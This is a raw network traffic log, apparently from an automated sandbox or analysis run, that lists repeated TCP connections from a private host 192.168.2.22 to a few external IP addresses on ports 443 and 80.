Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
